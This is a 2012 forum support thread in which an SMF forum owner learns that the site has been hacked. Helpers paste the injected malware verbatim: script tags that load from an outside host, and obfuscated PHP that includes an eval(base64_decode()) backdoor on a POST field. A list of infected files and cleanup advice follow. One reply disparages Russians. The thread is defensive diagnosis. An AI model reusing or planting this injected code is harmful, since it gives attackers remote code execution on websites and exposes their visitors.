Advertisement:

Author Topic: Weird indexing issue? Need help  (Read 1987 times)

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Weird indexing issue? Need help
« on: April 29, 2012, 11:30:13 PM »
So this just recently started happening with my site, which I have the slightest clue as to why. Whenever you visit my site, www.velocity-server.com , you'll notice that the indexing of the template is weirdly off, looking at the search box. Also the text is enlarged creating an off look to it.
Although, if you refresh the page about 2 times, everything reverts back to normal, and the issue disappears. I haven't downloaded any mods as of late, and I also un-installed the very last mods I implemented, just to be on the safe side, yet the issue still exists.

Any idea as to what it could be?  :(

My forum is currently running on SMF 2.0.2

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,374
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Weird indexing issue? Need help
« Reply #1 on: April 29, 2012, 11:34:57 PM »
Your website has been hacked code injected into your files.
If you view the source of your webpage very first line
Code: [Select]
<script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><script>document.cookie="location=1";</script><script src="http://phukjik.cri2.go.th/?rnd=1024%2Fsmurof%2Fmoc.revres-yticolev.www%2F%2F%3Aptth"></script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head
Community Suite - Take your forum to the next level built for SMF, Gallery,Store,Classfieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Latest Mod:
EzPortal - Portal System for SMF
Newsletter Pro SMF Gallery Pro SMF Classifieds SMF Store

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #2 on: April 29, 2012, 11:39:43 PM »
Oh my. Any possible way to extract that, and prevent it from happening again? I'm very limited when it comes to this, so I apologize if I may seem ignorant.
Should I be worried? That sounds serious.

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,374
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Weird indexing issue? Need help
« Reply #3 on: April 29, 2012, 11:46:02 PM »
Yeah I would do a backup of your files and database. Then reinstall the SMF files for your forum.
I do recommend deleting the files first before reuploading the SMF files if possible
Community Suite - Take your forum to the next level built for SMF, Gallery,Store,Classfieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Latest Mod:
EzPortal - Portal System for SMF
Newsletter Pro SMF Gallery Pro SMF Classifieds SMF Store

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #4 on: April 30, 2012, 12:17:47 AM »
Oh this is gonna be terrible. I backed up my whole database, backed up my whole directory to the forums as well. I tried re-installing SMF, overwriting the files, yet I ran into quite a bit of trouble. Was getting errors left and right. This is sad as my forum is pretty huge with 9k+ posts.

Which files do you recommend deleting first? And did you mean reupload ALL the SMF files? Or just certain ones

Offline vbgamer45

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 16,374
    • smfhacks on Facebook
    • VBGAMER45 on GitHub
    • @createaforum on Twitter
    • SMF For Free
Re: Weird indexing issue? Need help
« Reply #5 on: April 30, 2012, 12:22:19 AM »
I would reupload all the files..
Community Suite - Take your forum to the next level built for SMF, Gallery,Store,Classfieds,Downloads,more!

SMFHacks.com -  Paid Modifications for SMF

Latest Mod:
EzPortal - Portal System for SMF
Newsletter Pro SMF Gallery Pro SMF Classifieds SMF Store

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #6 on: April 30, 2012, 12:38:35 AM »
So what you're basically saying is a fresh re-install of SMF? That would mean I would have to do everything over, come to mods, custom work, everything? This is a real bummer. As I don't see any other way.

Offline Alb0

  • Semi-Newbie
  • *
  • Posts: 88
    • !V! Velocity
Re: Weird indexing issue? Need help
« Reply #7 on: April 30, 2012, 01:10:19 AM »
This code seems to have been inserted into most of the PHP files, which wasn't there prior.

Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}

Any clue how I could remove that from the PHP files without have to go through each single one?

Offline roqueiro

  • Newbie
  • *
  • Posts: 7
Re: Weird indexing issue? Need help
« Reply #8 on: May 03, 2012, 12:33:43 PM »
I found this:
Quote
$s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}                                    
                                    $s=substr(8,1);foreach(array(52,123,107,122,97,120,124,40,123,122,107,54,108,103,107,125,101,109,102,124,38,107,103,103,99,97,109,53,42,51,39,100,103,107,105,124,97,103,102,35,96,124,124,120,50,39,39,120,96,125,99,98,97,99,38,107,122,97,58,38,111,103,38,124,96,39,55,122,102,108,53)as$v){$s.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$v^8);}foreach(array(1,6,4,1,9,6,1,1,1,1,8,1)as$k=>$v){$t[$k]=substr($s,0,$v);$s=substr($s,$v);}$d=@$_COOKIE[$t[10]];if(!$d){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].$t[7].$t[12].$t[11].$t[4].$t[10].$t[8].$t[0].$t[9].$t[1].$t[3]);}elseif($d!=1){echo($t[0].$t[1].$t[3].$t[4].$t[5].$t[6].$t[7].$t[10].$t[6].(1).$t[7].$t[8].$t[0].$t[9].$t[1].$t[3].$t[0].$t[1].$t[2].$t[6].$t[7].$s.(1024).urlencode(strrev($d)).$t[7].$t[3].$t[0].$t[9].$t[1].$t[3]);}if(isset($_POST["showimg"])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST["showimg"])));exit;}   

And this:
Quote
                                    global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "hxxp:turnitupnow.net/?rnd= [nonactive]".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

In this files:
Base folder:
index.php
Settings.php

Sources folder:
Admin.php
Aeva-Sites.php
CustomForm.php
Display.php
Load.php
ManageBoards.php
ManageMaintenance.php
ManageSettings.php
ModerationCenter.php
ModSettings.php
PersonalMessage.php
Poll.php
Post.php
Profile-View.php
ScheduledTasks.php
Subs.php
Subs-Aeva.php
Subs-Aeva-Admin.php
Subs-Aeva-Custom-Example.php
Subs-Aeva-Sites.php
Subs-Boards.php
Subs-Editor.php
Subs-Members.php
Subs-Menu.php
Subs-Package.php
Subs-TopicRating.php

Themes\Default folder:
MessageIndex.template.php
TopicRating.template.php

Themes\Default\Language folder:
ManageScheduledTasks.english.php
Modifications.english.php
Modifications.portuguese_brazilian-utf8.php
TopicRating.english.php
TopicRating.russian.php
TopicRating.russian-utf8.php
TopicRating.spanish_es-utf8.php

Themes\Mytheme folder:
MessageIndex.template

IDK how this files as been hacked/modified. The modified date as not been changed.
For security, after correct files, change passwords.

Modify reason: Add Themes\Default\Language folder:
« Last Edit: May 03, 2012, 02:12:46 PM by roqueiro »

Offline thecity

  • Newbie
  • *
  • Posts: 6
Re: Weird indexing issue? Need help
« Reply #9 on: May 06, 2012, 07:56:43 AM »
I know someone using Wordpress, he has exact the same problem.
All the plugin files are infected with this malicious code.

Warning your host is a good idea. Those ****** russians..
« Last Edit: May 06, 2012, 08:39:57 AM by thecity »

MrPhil

  • Guest
Re: Weird indexing issue? Need help
« Reply #10 on: May 06, 2012, 11:44:50 AM »
Disable your site (put it in maintenance mode) so if the hack contains any drive-by infections, your users have less of a chance of picking up something while you do cleanup. Even better would be to insert an index.html file that just says "Sorry, temporarily closed while cleaning up.".

First, you need to figure out how the hacker got in and plug up those security holes before doing anything else. Work with your host to look at access logs. Check that you aren't granting ridiculous permissions such as 777 all over the place. Scan your PC (used to administer the site and forum) for spyware, password sniffers, and keystroke loggers. Enable the PC firewall and make sure the antivirus scanner is working. Change all the passwords: site account access, SMF Admin, FTP, and even the database if you feel up to it.

Then you either
  • edit the files one by one, or
  • erase all files EXCEPT Settings.php, Settings_bak.php, avatars, and attachments, and either
    • restore all files from a known good backup, or
    • copy in all the files in a "Large Upgrade" to refresh your SMF system, then re-install all mods and custom work

You want to make sure you don't leave any unaccounted-for files lying around, that might be backdoors or Trojans. Most hacks don't involve the database, but keep an eye out for any evidence that has happened (that will be an ugly cleanup job!).